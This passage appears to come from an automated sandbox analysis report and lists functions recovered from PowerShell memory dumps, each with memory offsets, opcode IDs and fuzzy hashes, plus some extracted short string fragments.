                  • Instruction Fuzzy Hash: 39817D34A002158FDB15DFA9D984AAEBBF6FF88311F24C569D4059B365EB34EC06CB90
                  Function 085761C0 Relevance: .1, Instructions: 146COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c5b3bab196c0ac4f3ab0f7bc5ad972b048ced032596a876a2567930d20ceb29
                  • Instruction ID: dd6d224ecca6a98f0553a834340b8af11f9700dd46cffa8acd44f7c92d736915
                  • Opcode Fuzzy Hash: 9c5b3bab196c0ac4f3ab0f7bc5ad972b048ced032596a876a2567930d20ceb29
                  • Instruction Fuzzy Hash: B151B370A05285CFCB06CF98C8D49EEBBF1FF59300B1981AAD844AB366D735AC45CB91
                  Function 0775B044 Relevance: .1, Instructions: 125COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38b5f7fd75ee4cf82ecde20bc62dd148f123044894dfd2dba375de451a86ac1d
                  • Instruction ID: f5cdd9fb378ea181e3f04eb385bd39a4d395136188a5f216f97118a68db58ece
                  • Opcode Fuzzy Hash: 38b5f7fd75ee4cf82ecde20bc62dd148f123044894dfd2dba375de451a86ac1d
                  • Instruction Fuzzy Hash: E4415CF0A10302DFCB208F688541B7EBBE6AF85294F148995DC049F6B5D7B5C841C7B1
                  Function 08575BF1 Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8ad56f38d19e36b145d4a3c5ceffe61a6ca43ceff34132ecc80e60da5fb2ff8
                  • Instruction ID: 8ef492b4a1b2e0811beb1cfa52e3cfe567f8913d226aeed22a8ef8e83003d04e
                  • Opcode Fuzzy Hash: e8ad56f38d19e36b145d4a3c5ceffe61a6ca43ceff34132ecc80e60da5fb2ff8
                  • Instruction Fuzzy Hash: A9412B74A015059FCB45CF9CD984AAEBBB1FF48321B248268E915EB3A5D735EC41CB90
                  Function 085761B0 Relevance: .1, Instructions: 112COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aee8ab6468f631a8a2b10eda71d0381cc5e06fdda53c19998c0a07b267114329
                  • Instruction ID: bcd48af556868647106509d102b7ef5a9ede8088e8c3c85543f65ea5d2256e83
                  • Opcode Fuzzy Hash: aee8ab6468f631a8a2b10eda71d0381cc5e06fdda53c19998c0a07b267114329
                  • Instruction Fuzzy Hash: 1C412574A00609DFCB15CF98D9949AEBBF2FF88311B248269D945AB365D731EC41CB90
                  Function 07759016 Relevance: .1, Instructions: 102COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 57a0dab7ef7e20d622c8cd7abe8ffadde9ec4a8824d06e9abd08dc21facc29c1
                  • Instruction ID: 801d35949536c24641e500fc93bda9848083abd087e5171096e3764d1b84cdb0
                  • Opcode Fuzzy Hash: 57a0dab7ef7e20d622c8cd7abe8ffadde9ec4a8824d06e9abd08dc21facc29c1
                  • Instruction Fuzzy Hash: 203185747512149FDB049768C555BAE7AA7EFC4340F108814EA016F395CFB7AC01CBE2
                  Function 08570790 Relevance: .1, Instructions: 82COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1226095e8a7828b56fbf566b9a1cc45e9eb80346ce1bfcf2665a2f075fa4c2cb
                  • Instruction ID: e413efc338b2578756785f87d75edddc18886e7896c97411e1c494e31a9cd2e1
                  • Opcode Fuzzy Hash: 1226095e8a7828b56fbf566b9a1cc45e9eb80346ce1bfcf2665a2f075fa4c2cb
                  • Instruction Fuzzy Hash: 2E313674A00609DFCB14CF98D5809AAFBF1FF49310B2586A9D459EB3A5C731EC81CBA0
                  Function 077544EC Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54a542540779702ba57c876d0f0c4de65b069767f35d93c5aca33a8494e33e5b
                  • Instruction ID: 1061937a95b12a046a63da3456d3775e678c49fc4a0b4de9815948a671f9d6f5
                  • Opcode Fuzzy Hash: 54a542540779702ba57c876d0f0c4de65b069767f35d93c5aca33a8494e33e5b
                  • Instruction Fuzzy Hash: CC115EB530A3C19FC712CB649965A61BF71AF83341F1EC0C7DC548F1A3C6A2898ACB52
                  Function 08575709 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d7a1c0659e5aa4b62021c1b04144a5612cdcbdbb8356b51f7f7742913ca7acc7
                  • Instruction ID: f61f76821767dd7bbd307af5f1994d1671ecba21c6ea268afefcfa43948855d4
                  • Opcode Fuzzy Hash: d7a1c0659e5aa4b62021c1b04144a5612cdcbdbb8356b51f7f7742913ca7acc7
                  • Instruction Fuzzy Hash: 83012634200205DBCB6D9B28E0845B9B7ABFFC0241724C46DD04A8BA00DB39E859CFC0
                  Function 085754A0 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0f73cdbcb5c067f3d4140ace5e1d7a7f39e8b2354553bbb87d853c04ef7f49fe
                  • Instruction ID: ddc6698dcace7615f83704f393ed98ac7162803c78d1cfb9c7864aacda47ec21
                  • Opcode Fuzzy Hash: 0f73cdbcb5c067f3d4140ace5e1d7a7f39e8b2354553bbb87d853c04ef7f49fe
                  • Instruction Fuzzy Hash: 52019A30A04209DFDB249FE4E945ABDBBB2FF44346F348428E102AB294EB755841CF40
                  Function 0857537F Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc024483c616536ad31f3f35e545097b547530ad8ef48defd02baa2f92e9f055
                  • Instruction ID: 7322004c2f9a96735830a268dfe8f539254d27bed8a16870b2a9f2c592004389
                  • Opcode Fuzzy Hash: bc024483c616536ad31f3f35e545097b547530ad8ef48defd02baa2f92e9f055
                  • Instruction Fuzzy Hash: A9015A34A44209DFDF149FE0E915AADBBB2FF84346F248428E502AB2A4EBB55851CF01
                  Function 08575791 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dffe9ee1206a0a2c49df4e1574e794efc4046e08852ec52314cf0e8d83c4f434
                  • Instruction ID: 229dc731ed0cc2271fc53375672b268b80cedd96493c000374c4f9ec6a1251c2
                  • Opcode Fuzzy Hash: dffe9ee1206a0a2c49df4e1574e794efc4046e08852ec52314cf0e8d83c4f434
                  • Instruction Fuzzy Hash: 6DF04C34E482489FCB45DBEDE8849EE7F79EF46150F4082B9D0445B252D635980BC791
                  Function 085755FB Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e553a4ebe17d1029fc69d30f74725396a78e0bd3890a6c5685c83b51ff2fec8
                  • Instruction ID: 5be82d42ca8a9123a29b07ea39abc1be8cff6a78cc3da04254779d4f3bab9270
                  • Opcode Fuzzy Hash: 2e553a4ebe17d1029fc69d30f74725396a78e0bd3890a6c5685c83b51ff2fec8
                  • Instruction Fuzzy Hash: 61F0C234644209DBDF049FB0EA15A7D7B31BF40309F608819E102DB294EF755D01CB51
                  Function 08575428 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7b2df3fd860618d69cc6ea6e4d7c4fefb4416fb6b6e500fd1b03f869c01b880
                  • Instruction ID: 3fc475bc408d6bcea924e2b9e528ed556e6a8c2e3caa90e8fe7eb74dcdad32c7
                  • Opcode Fuzzy Hash: a7b2df3fd860618d69cc6ea6e4d7c4fefb4416fb6b6e500fd1b03f869c01b880
                  • Instruction Fuzzy Hash: 7EF01934940109DFCB54DFE0EA59AAE7BB5FB48381F308128E502E7264EA745D55CF50
                  Function 08575500 Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e0ff53a9bf36c72159b6a0ad2de94ce0d55903b0479d1244ae9ce3e95f0386c
                  • Instruction ID: 3abb77c7a1cb8bc1dab3dcfeab49e5c4719c97e4c8d60c810378b56f18155f3b
                  • Opcode Fuzzy Hash: 8e0ff53a9bf36c72159b6a0ad2de94ce0d55903b0479d1244ae9ce3e95f0386c
                  • Instruction Fuzzy Hash: F2F08734940109EFCF649FE0EA19AAEBFB1FF48380F208028F502E7264EA741911CF50
                  Function 085753DC Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4f22fb6632fe2b7e03e2eb1369a151de2f7034b1b855b18a20b34179aa1bd41
                  • Instruction ID: 66acd897e4a3a028b7945c7bfc9f41bc4cd9797320d113e90c06edcad1a59b8d
                  • Opcode Fuzzy Hash: a4f22fb6632fe2b7e03e2eb1369a151de2f7034b1b855b18a20b34179aa1bd41
                  • Instruction Fuzzy Hash: 48F01470940219EFCF549FE4EA15AADBBB6FF48381F244028E502E6264EBB41951DF51
                  Function 085752F8 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b626647c37869df680303659305bed6ded5a6d931acaead3de07b9d8449aeee
                  • Instruction ID: 07b7a5438ef0363fa2e5b7595699c51e263995f0d8a60768bd278d2fb2187bbd
                  • Opcode Fuzzy Hash: 6b626647c37869df680303659305bed6ded5a6d931acaead3de07b9d8449aeee
                  • Instruction Fuzzy Hash: F0F04434940209EFDF449FE0E959AAEBF71FB48381F208428E902EB2A4EA745851CB50
                  Function 0857533B Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1470a88b9409cea80785bdecb5796031457879415843d792a473ab0e40735feb
                  • Instruction ID: 302af1e7f06ab81430da312736e6d5784db082620979999e0322cf93113adb52
                  • Opcode Fuzzy Hash: 1470a88b9409cea80785bdecb5796031457879415843d792a473ab0e40735feb
                  • Instruction Fuzzy Hash: ABF04930940209DFCF449FE0EA19AADBBB2FF48381F244418E502EB264EA745951CB00
                  Function 0857554B Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6caabe796dedcc0014b28c7d411c6a9ac5e40876ed969c42609baf9fa36ccf3c
                  • Instruction ID: c19c334fbc50b7158c4c534e56aebc7ebb8f57b7d51d9df3badef0dac247fb29
                  • Opcode Fuzzy Hash: 6caabe796dedcc0014b28c7d411c6a9ac5e40876ed969c42609baf9fa36ccf3c
                  • Instruction Fuzzy Hash: 34F0A034A44119DBDB04DF90EA15A6E7BB1FB04385F308418E502EB254DF745A05CB91
                  Function 08575665 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 22901fdd0362f6e77c768a58091ed330388cb01a833f7c0ab5c36cc40d42e19f
                  • Instruction ID: cfa18beb7abe498eb46075d30403564cb5bd6651a330e727a292e1d6487b4915
                  • Opcode Fuzzy Hash: 22901fdd0362f6e77c768a58091ed330388cb01a833f7c0ab5c36cc40d42e19f
                  • Instruction Fuzzy Hash: 78F0A034A44109DBDB04DFA0EA15AAE7B75FB08345F308418E502EB254DF745A05CB91
                  Function 0857563D Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eea976ee4e7aed8a73648f5ecc123c8ef0045bc81f19a7cf45c65d3e20321a93
                  • Instruction ID: b6e1b36f1244ca4795068902453abce6572cc64b9c52eaa979b5dc60f127ff5b
                  • Opcode Fuzzy Hash: eea976ee4e7aed8a73648f5ecc123c8ef0045bc81f19a7cf45c65d3e20321a93
                  • Instruction Fuzzy Hash: 68E06D74584209DBDF049BA0EA15E6E7B25BB04345F208418E502EA164DAB45914DA51
                  Function 085755D3 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction ID: eb4699daac6f6e4d073b102481b571c9ab117dd634e8ec7ac2f82bbe83ba7a69
                  • Opcode Fuzzy Hash: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction Fuzzy Hash: 83E09274544209DBDF049FA0FA15E6E7B35BB04345F308414E502E7154DBB45904CB51
                  Function 085755AD Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction ID: eb4699daac6f6e4d073b102481b571c9ab117dd634e8ec7ac2f82bbe83ba7a69
                  • Opcode Fuzzy Hash: 2375b44075a933251e309284c77b81d269a61a9e02cfd810688039a2bdf53f8f
                  • Instruction Fuzzy Hash: 83E09274544209DBDF049FA0FA15E6E7B35BB04345F308414E502E7154DBB45904CB51
                  Function 085752EC Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9609fbb5609dc454400a061377fe6226581ce4b6c3dae878e5b0545e36efd5b0
                  • Instruction ID: df5388b3b5138c588af31b2901e8bfbaefc97d64a4b974759e6e7b8b5790abbf
                  • Opcode Fuzzy Hash: 9609fbb5609dc454400a061377fe6226581ce4b6c3dae878e5b0545e36efd5b0
                  • Instruction Fuzzy Hash: F7D0C9B494530BDAEB14DF90F755BBE7A70BB04289FB08819E401F6190FBB446498A92

                  Non-executed Functions

                  Function 07750BB0 Relevance: 18.0, Strings: 14, Instructions: 454COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ojq$(ojq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$tPjq$tPjq
                  • API String ID: 0-1429883413
                  • Opcode ID: c751bd8e9dd6fcd77e10f5f39e33c5e584670ce56edb82b8fbffc2fe99927946
                  • Instruction ID: 12050d30c92fa7b643087847d558165a4b60a86a588d05f3bdf6efea2c641aec
                  • Opcode Fuzzy Hash: c751bd8e9dd6fcd77e10f5f39e33c5e584670ce56edb82b8fbffc2fe99927946
                  • Instruction Fuzzy Hash: B0F1B0B1B40219DFCB14CF68C554BAABBA6FF89350F248869ED059B390CBB1DC41CB91
                  Function 07753658 Relevance: 12.8, Strings: 10, Instructions: 301COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                  • API String ID: 0-2815571254
                  • Opcode ID: 4e57d4e1719cd9e990f894d5ab6b497d5eb5161e9290ecd18d314b9b3f0da761
                  • Instruction ID: 8b715163607962f43777d642cae63a4ac5b9cb88ad2f7752ce672a20a93104a1
                  • Opcode Fuzzy Hash: 4e57d4e1719cd9e990f894d5ab6b497d5eb5161e9290ecd18d314b9b3f0da761
                  • Instruction Fuzzy Hash: 0EA148F1B043069FDB245B68885077A7BA6EF822D8F14887ADC05CB2B1DBB5DD44C7A1
                  Function 07753D38 Relevance: 9.0, Strings: 7, Instructions: 228COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq
                  • API String ID: 0-1331764258
                  • Opcode ID: 1fdf8fefb836fcc1253421451a220be66b9b3aab22375d60c3b6934e7b468e80
                  • Instruction ID: 6c10d670a57512e57de9b4b6712a7a7d52702b30c57339d3104e1b66b0a86bb5
                  • Opcode Fuzzy Hash: 1fdf8fefb836fcc1253421451a220be66b9b3aab22375d60c3b6934e7b468e80
                  • Instruction Fuzzy Hash: 00713871704206DFCF148B69D4106BAB7E6EFC12D4F2488AADC06CB2A1DBB2CD55C7A1
                  Function 07753F98 Relevance: 7.9, Strings: 6, Instructions: 364COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$$jq$$jq$$jq
                  • API String ID: 0-3302318582
                  • Opcode ID: 6ac398eeda6935018324d1d67d7823035200992211f4d777829af2e238b70880
                  • Instruction ID: 505a6fd3c680b614b691b61669952166c957526ea70bc06a3cd83914ed7f8fe4
                  • Opcode Fuzzy Hash: 6ac398eeda6935018324d1d67d7823035200992211f4d777829af2e238b70880
                  • Instruction Fuzzy Hash: D5C14CB16053869FCB158F64C8506A67FB5AF82290F28C8ABDC48CF1A2D775CD85C762
                  Function 07751450 Relevance: 6.6, Strings: 5, Instructions: 300COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$tPjq$tPjq$tPjq
                  • API String ID: 0-151847230
                  • Opcode ID: 3d859bd45a812064fff4115e792da2b94f2cee699da47565b446780ac9a4e790
                  • Instruction ID: c6ba992bac13ed7d724965c96eb79a18944e0e460ec076c6a0cda1f9cb5c9a03
                  • Opcode Fuzzy Hash: 3d859bd45a812064fff4115e792da2b94f2cee699da47565b446780ac9a4e790
                  • Instruction Fuzzy Hash: E0A15BB5B043499FCB119B6C8850766BBE6EF82352F58C8ABDC06CB251DBB1CC40C7A1
                  Function 07752C7D Relevance: 6.4, Strings: 5, Instructions: 118COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$tPjq$$jq$$jq$$jq
                  • API String ID: 0-728028659
                  • Opcode ID: 45878b8c49f418e40a9a5a4c1992890fa0c315e29525dadf445d9e5493fe5a23
                  • Instruction ID: 7cb68bce1bc8a177be1256e1eabb84070a83bdafa4443e921ae22cd4a90fc526
                  • Opcode Fuzzy Hash: 45878b8c49f418e40a9a5a4c1992890fa0c315e29525dadf445d9e5493fe5a23
                  • Instruction Fuzzy Hash: 9941D4F1A04301EFDB258F14C548BA6B7B2BF45390F1884AAEC155B293CBB1D941CB91
                  Function 0775CF88 Relevance: 5.5, Strings: 4, Instructions: 484COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ojq$(ojq$(ojq$(ojq
                  • API String ID: 0-3475039101
                  • Opcode ID: 6b02cef049ba02d7c54d911f9c15c7fe06c880b8ddf2a8997de116df14c967f4
                  • Instruction ID: 5257c8059890c96db974b2ba1da8cf5ce441eda2f3e0b1f0a7afca0492bb4d7b
                  • Opcode Fuzzy Hash: 6b02cef049ba02d7c54d911f9c15c7fe06c880b8ddf2a8997de116df14c967f4
                  • Instruction Fuzzy Hash: 0EF138B1704306DFDB359F68C8907AABBE6EF81350F14886AED05CB291DBB1D845C7A1
                  Function 07750B30 Relevance: 5.3, Strings: 4, Instructions: 294COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$tPjq$tPjq
                  • API String ID: 0-1557731583
                  • Opcode ID: 283ea7b0b028e951ce1ecdcf6a556fe3ec2f26979515dfcfc6c9073876c2d1b6
                  • Instruction ID: 583c6da0f26582527256d1d0e5f9237a63b94d2f15acd17cc055f1307a2e83d4
                  • Opcode Fuzzy Hash: 283ea7b0b028e951ce1ecdcf6a556fe3ec2f26979515dfcfc6c9073876c2d1b6
                  • Instruction Fuzzy Hash: 5EB1D2B1A05355DFCB14CF64C984AAAFBF2BF4A350F19849AEC449B291C7B1DC81CB91
                  Function 07750B90 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$tPjq$tPjq
                  • API String ID: 0-1557731583
                  • Opcode ID: 284b385ff64b3d69ce75bdaedcc6224ce75b7e6b08cf75f8deb764accd041a42
                  • Instruction ID: 49442b734105caef46ad9ba2e5e29d6f07dbfbcc70dbe9e06bf9b2e4d69cf26e
                  • Opcode Fuzzy Hash: 284b385ff64b3d69ce75bdaedcc6224ce75b7e6b08cf75f8deb764accd041a42
                  • Instruction Fuzzy Hash: D99182B1A01319DFDB24CF64C584BAAFBB2BF49390F198459ED059B291C7B1EC81CB91
                  Function 077523A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $jq$$jq$$jq$$jq
                  • API String ID: 0-2428501249
                  • Opcode ID: 9abda200b2a9564057b50e4655a331b88978ab7360b34ff5e33ae50ff65036f1
                  • Instruction ID: 04775c8669c5e594bc6c3ac64cf0a26e8e83bd566af69a68fd2c9ef61dd8b643
                  • Opcode Fuzzy Hash: 9abda200b2a9564057b50e4655a331b88978ab7360b34ff5e33ae50ff65036f1
                  • Instruction Fuzzy Hash: CF2147F53143169BDB245A2A9840B7777DABBC1751F24883AAD09CB3C3DDB5CC4083A1
                  Function 077512E8 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
